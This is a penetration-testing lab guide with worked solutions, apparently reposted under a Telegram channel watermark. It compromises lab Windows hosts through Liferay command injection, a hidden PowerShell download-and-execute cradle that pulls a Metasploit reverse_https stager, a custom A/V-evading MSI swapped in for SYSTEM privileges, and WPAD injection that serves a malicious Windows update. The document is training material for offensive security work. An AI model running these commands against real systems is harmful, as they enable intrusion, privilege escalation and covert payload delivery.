credential/hash reuse is involved for this
lateral movement. Leveraging weak network and
infrastructure configurations as well as
insufficiently secure Windows components is all
you will see on this lab.

Specifically, you will learn the following:

● How weak network and infrastructure

configurations can be combined with
legitimate Windows functionalities to
compromise a target

● Privilege escalation by exploiting

insufficiently secure Windows services

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● Network manipulation attacks such as WPAD

injection and Windows update injection

● How to create a custom MSI installer to evade

A/V solutions

To guide you during the lab you will find

different tasks.

Tasks are meant for educational purposes and to

show you the usage of different tools and
different methods to achieve the same goal.

They are not meant to be used as a methodology.

Armed with the skills acquired though the task,

you can achieve the lab goal.

If this is the first time doing this lab, we

advise you to follow these tasks.

Once you have completed all the tasks, you can

proceed to the end of this paper and check the
solutions

Recommended tools

● Metasploit

● Visual Studio (required)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● IDA

● Invoke-Inveigh module for WPAD injection

● wsuspect-proxy

Tasks
Task 1: Identify any vulnerabilities on the installed
software of the Windows 10 machine

The first step of this lab is to identify any

vulnerabilities on the installed software of the
Windows 10 machine. Then, exploit any identified
vulnerabilities.

Important Note: Before investigating the Windows

10 machine, a user must be logged on into the
target for the vulnerable service to start. So,
first, RDP into the target machine
(10.100.11.100) and then return back to your
attacking Linux machine.

Credentials:

● Username: ELS\employee1
● Password: P@ssw0rd123

Then, please wait for some minutes, until Tomcat

fully loads.

Task 2: Identify any weak configurations regarding proxy

settings and Windows Update on the network

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

1. Internal DNS servers lacking DNS A or CNAME

records with the name "wpad" are not
uncommon, even on highly secured
environments. Those records, when added,
protect hosts from a rogue WPAD server that
could poison their WPAD settings. Check if
those records exist to determine if WPAD
injection attack is possible.

2. Query the Windows 10 machine's registry to

gather useful information about the WSUS
setup. You should look for the WSUS URL and
UseWUServer value. Finally, try to understand
whether automatic detection of the proxy is
likely set through the
DefaultConnectionSettings value.

Task 3: Escalate privileges on the Windows 10 machine

Enumerate all running processes on the Windows 10

machine. Try to identify any uncommon/custom
executable that may have vulnerabilities. Exploit
one of those vulnerabilities to gain a
meterpreter session.

Task 4: Perform WPAD injection against the Windows 7 and

serve a malicious Windows update

In Task 2, you identified weak proxy settings

that enable a WPAD injection attack as well as
Windows Updates being performed over HTTP. In

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Task 3, you got a meterpreter session with SYSTEM

privileges.

Now you can perform a WPAD injection, since

executing this attack requires a privileged
account (if executed through Inveigh).

To make the attack more convincing, you can

deliver your payload through Windows Update. This
is feasible due to the fact that Windows Update
was found to be performed over HTTP.

To deliver your payload through Windows Update,

you perform a WPAD injection attack, through your
Windows 10 meterpreter session, which causes the
windows 7 machine to connect to the proxy set up
by wsuspect proxy. Wsuspect-proxy will then
handle proxying the Windows 7 machine's requests.
When the required man-in-the-middle conditions
are met (Windows 7 machine checks for updates
with WSUS), wsuspect-proxy will serve your
malicious payload as a Windows update.

The Invoke-Inveigh module can prove helpful...

Note: Once Invoke-Inveigh is executed, the WPAD

poisoning will occur when the required
man-in-the-middle conditions are met. To speed
things up, RDP into the Windows 7 Machine
(10.100.11.101) (credentials:
ELS\employee2:P@ssw0rd123) and restart the
machine (cmd.exe -> "shutdown /r").

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Solutions
Below, you can find solutions for each task.
Remember to achieve the labs objectives, you can
follow your own strategy (which may be different
from the one explained in the following lab).

Task 1: Identify any vulnerabilities on the installed

software of the Windows 10 machine

Perform a TCP scan with version detection against

this machine, using Nmap.

nmap -sT -sV 10.100.11.100

You should see results similar to the following:

It looks like there is an application running on

port 8080. Try to browse it using your browser.
You should see something similar to the
following.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Luckily, there is a public exploit that could

work against the Liferay Portal you identified
running on the Windows 10 machine.
https://www.exploit-db.com/exploits/35652/

Before you actually check if the public exploit

works, be aware of two facts:

1. The telnet service you are going to

interact with will not handle some special
characters (such as "$") correctly.

2. While checking for command injection, as

the exploit suggests, you will not be able to
see the results of the commands you will try
to inject.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

First, create a PowerShell based reverse_https

stager as follows.

The below uses MSF4, you can create a similar

stager with MSF5 (using any payload type and even
without an SSL cert)

#Creating a SSL certificate for the reverse_https

payload
msf > use auxiliary/gather/impersonate_ssl
msf auxiliary(impersonate_ssl) > set RHOST
www.google.com
msf auxiliary(impersonate_ssl) > run
msf auxiliary(impersonate_ssl) > back

#Creating the payload

msf > use
payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST
Your_machine's_IP
msf payload(reverse_https) > set LPORT 443
msf payload(reverse_https) > set stagerverifycert
true
msf payload(reverse_https) > set HANDLERSSLCERT
/root/.msf4/loot/20170908151125_default_172.217.2
1.100_www.google.com_p_175099.pem
msf payload(reverse_https) > generate -t
psh-reflection -f /tmp/rev_https.ps1

#Setting up the listener

msf payload(reverse_https) > use
exploit/multi/handler

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

msf exploit(handler) > set payload

windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST
Your_machine's_IP
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set stagerverifycert true
msf exploit(handler) > set HANDLERSSLCERT
/root/.msf4/loot/20170908151125_default_172.217.2
1.100_www.google.com_p_175099.pem
msf exploit(handler) > run

Now, create a small script which will retrieve

and execute the Metasploit's stager you just
created, as follows.

$g=new-object
net.webclient;$g.proxy=[Net.WebRequest]::GetSyste
mWebProxy();$g.Proxy.Credentials=[Net.CredentialC
ache]::DefaultCredentials;IEX
$g.downloadstring('URL_of_the_file_metasploit_cre
ated_above');

Use Powersploit's Out-EncodedCommand module to

convert the script above into an one-liner. This
way you will avoid the special characters that
are not properly handled by the telnet service.

To get the one-liner simply append the following

line on the Out-EncodedCommand module and execute
it.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Out-EncodedCommand -ScriptBlock {$g=new-object

net.webclient;$g.proxy=[Net.WebRequest]::GetSyste
mWebProxy();$g.Proxy.Credentials=[Net.CredentialC
ache]::DefaultCredentials;IEX
$g.downloadstring('URL_of_the_file_metasploit_cre
ated_above');} | out-file path for the output

Finally, try to compromise the machine, by

executing the following.

>> telnet 10.100.11.100 11311

g!>> system:getproperties
g!>> exec
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\power
shell.exe -noP -sta -w hidden -enc put
Out-EncodedCommand module's output here (only the
base64 part)"

A meterpreter session should be established !

Task 2: Identify any weak configurations regarding proxy

settings and Windows Update on the network

1. Checking if DNS A or CNAME records with the

name "wpad" exist is trivial. You can simply
check if wpad.els.local resolves to an IP.

2. To identify the WSUS settings and to

determine if automatic detection of the proxy
is performed, you can query the Windows 10
machine's registry. Specifically, execute the
following queries:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

meterpreter> shell
>> reg query
HKLM\Software\Policies\Microsoft\Windows\WindowsU
pdate /v WUServer

The above will return the WSUS URL.

>> reg query

HKLM\Software\Policies\Microsoft\Windows\WindowsU
pdate\AU /v UseWUServer

From the above you will determine whether the

machine gets its updates from a WSUS server
(value = 1) or not (value = 0).

>> reg query

"HKCU\Software\Microsoft\Windows\CurrentVersion\I
nternet Settings\Connections"

If the 5th byte of the result is even, automatic

detection of the proxy may be set in Internet
Explorer.

Task 3: Escalate your privileges on the Windows 10 machine

Enumerate the running processes by executing the

following into meterpreter.

meterpreter > ps

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Executable.exe seems uncommon. Detect its

location by executing the following.

meterpreter > search -f Executable.exe

You should receive the following.

To download it for local analysis, execute the

following in meterpreter:

meterpreter > cd c:/"Program Files

(x86)"/"Program Folder"/"A Subfolder/"
meterpreter > download Executable.exe

Load Executable.exe into IDA. Under Load a new

file, leave the default settings. Then, inspect
the strings inside the executable by pressing
Shift + F12. You should see the following:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

It appears that Executable.exe downloads a MSI

installer and executes it.

You can search for the ".msi" string by pressing

Alt + T and choosing Find all occurrences.

You should see the following:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

It seems that installer.msi is fetched from a

remote location over HTTP. Previously, you also
identified that the installer is then executed.
If the installer is executed at a specific
interval you could replace it with your own
malicious one and get it executed.

Finally, check if Executable.exe is connected to

a Windows service. If this is the case, it is
very likely that your MSI installer will be
executed with SYSTEM privileges.

You can do this by pressing Alt + T, choosing

"Find all occurrences" and searching for the
string "service". You will see the following:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Luckily, Executable.exe is related to a Windows

service named "ea".

You now have to create a malicious MSI installer

that will replace the one being downloaded by
Executable.exe. Using Metasploit for creating a
malicious MSI installer is out of the question,
due to the fact that the template it uses is
recognized by the majority of A/Vs.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

To create a custom MSI installer that will load

Metasploit's stager into memory, you will use the
following.

● Microsoft Visual Studio 201X Installer

Projects from marketplace.visualstudio.com

● The C# source code used on the custom

ClickOnce application that utilized
SharpPick's RunPS function.

● The windows/meterpreter/reverse_https
(PowerShell reflection) stager used above,
but communicating to another port

The steps to create the custom MSI installer in

Visual Studio are as follows:

1. Install Microsoft Visual Studio 201X

Installer Projects from
marketplace.visualstudio.com

2. Restart Visual Studio

3. File - New - Project - Visual C# - Console

Application

4. Take the Metasploit stager (PowerShell

reflection) that Metasploit created in Task 1
and base64 encode it

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

5. In Program.cs copy paste the C# source code

used in the custom ClickOnce application (the
one that utilized SharpPick's RunPS function)
and place the base64 encoded Metasploit
stager inside the b64cmdstring variable.

6. On the solution explorer, right click on

references and choose Add Reference... Browse
to C:\Program Files(x86)\Reference
Assemblies\Microsoft\WindowsPowershell\3.0\Sy
stem.Management.Automation.dll. Then, tick
the box on the left of the DLL name to add it
as a reference.

7. In the solution explorer, right click on

the Console Application you created and
choose Properties. On the Application tab,
choose Windows Application as the Output File
(this way the application will run with no
visible console window). On the Build tab,
choose Platform Target "x86" (this is for
compatibility reasons with the specific
Metasploit stager).

8. Note that if there are any errors during

building the project, you may have to adjust
the Target Framework on the Application tab.

9. In the solution explorer, right click on

the solution you created, choose Add - New
Project - Other Project Types - Visual Studio

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Installer - Setup Project

10. In the solution explorer, right click on

the Setup project and choose View - User
Interface. Then, delete everything under the
Start, Progress and End categories. This is
because msiexec will be used to install the
malicious MSI installer and you do not want
any UI elements obstructing the procedure

11. In the solution explorer, right click on

the setup project and now choose View - File
System. Right click on the Application Folder
and choose Add - Project Output. You should
see your Console Application in the project's
attribute. Click OK. This is how you choose
the application to be installed. In addition,
while you are in the File System view, right
click on the Application Folder and choose
Properties Window. Set the DefaultLocation
attribute to:

[WindowsVolume][Manufacturer]\[ProductName]

12. In the solution explorer, right click on

the Setup project and now choose View -
Custom Actions. Right click the commit folder
and choose Add - Custom Action... Navigate to
the Application Folder and choose the project
output you created above. In the action's
properties (at the right bottom of your

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

screen) set InstallerClass to false.

All the above will launch the application once it

is installed, automatically.

1. Finally, click on the setup project on the

Solution Explorer and on the properties
window (right bottom of your screen) set the
TargetPlatform attribute to "x64".

2. Right click on the Console Application and

choose Build, do the same for the setup
project. Your installer should be created
successfully.

Now, back to your attacking machine. Upload your

own malicious installer.msi, through the
established meterpreter session as follows.

meterpreter > upload installer.msi C:\

Luckily, the downloaded installer.msi is executed

multiple times at specific intervals and so the
malicious installer.msi you uploaded was
executed, providing you with a new meterpreter
session with SYSTEM privileges.

You found a way to escalate your privileges.

Congrats!

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Task 4: Perform WPAD injection against the Windows 7 machine

and serve a malicious Windows update

You now fulfill all the requirements to perform a

WPAD injection attack. Weak proxy settings were
identified and you have a meterpreter session
with SYSTEM privileges. You could use Responder
(https://github.com/lgandx/Responder) for the
WPAD injection attack, but in this lab's context,
we will use the Invoke-Inveigh module.

Before you continue with the WPAD injection

attack, setup a proxy using wsuspect-proxy. To do
this, first go to .../wsuspect-proxy/payloads and
edit payloads.ini. On the 6th line replace cmd
with any command you want to be executed through
PsExec on the Windows 7 machine. Then, execute
the following, from inside wsuspect-proxy's
folder.

python wsuspect_proxy.py psexec local_port

Now, host Inveigh.ps1 on a server you control and

drop it on the target (loading it on memory
through IEX seems unstable at times).

meterpreter > shell

C:\Windows\system32>powershell "IEX (New-Object
Net.WebClient).DownloadFile('http://ip:port/Invei
gh.ps1','C:\Users\Public\Inveigh.ps1')

Then, load PowerShell from inside the privileged

meterpreter session and execute the attack as
follows:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

``` meterpreter > load powershell meterpreter >

powershell_shell PS > cd C:\Users\Public PS >
import-module .\Inveigh.ps1 PS > Invoke-Inveigh
-IP 10.100.11.100 -WPADAuth Anonymous -SMB N
-WPADPort
local_port_you_specified_on_wsuspect-proxy
-WPADIP your_machine's_IP_(192.168.200.XX) ````

You should see something similar to the below.

The labs' environment is not connected to the

internet and therefore WSUS will not be able to
push updates. In essence, what you have to
achieve is seeing traffic from the Windows 7
machine inside the proxy you created using
wsuspect_proxy.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The WPAD poisoning will occur when the required

man-in-the-middle conditions are met. To speed
things up, RDP into the Windows 7 Machine
(10.100.11.101) (credentials:
ELS\employee2:P@ssw0rd123) and restart the
machine (cmd.exe -> "shutdown /r").

When the required man-in-the-middle conditions

are met, you will see something similar to the
following on wsuspect_proxy. Game is essentially
over since you can now push any malicious update
you want!

If the labs' environment was connected to the

internet, then, on the Windows 7 machine you
would see that the malicious update you specified
on wsuspect-proxy was injected and pushed
successfully.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Once the target installs this update, the command

you specified on wsuspect_proxy's payloads.ini
will be executed, through PsExec.

Congrats, you managed to compromise a Windows 7

machine through a Windows 10 machine, leveraging
weak proxy and Windows Update configurations.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa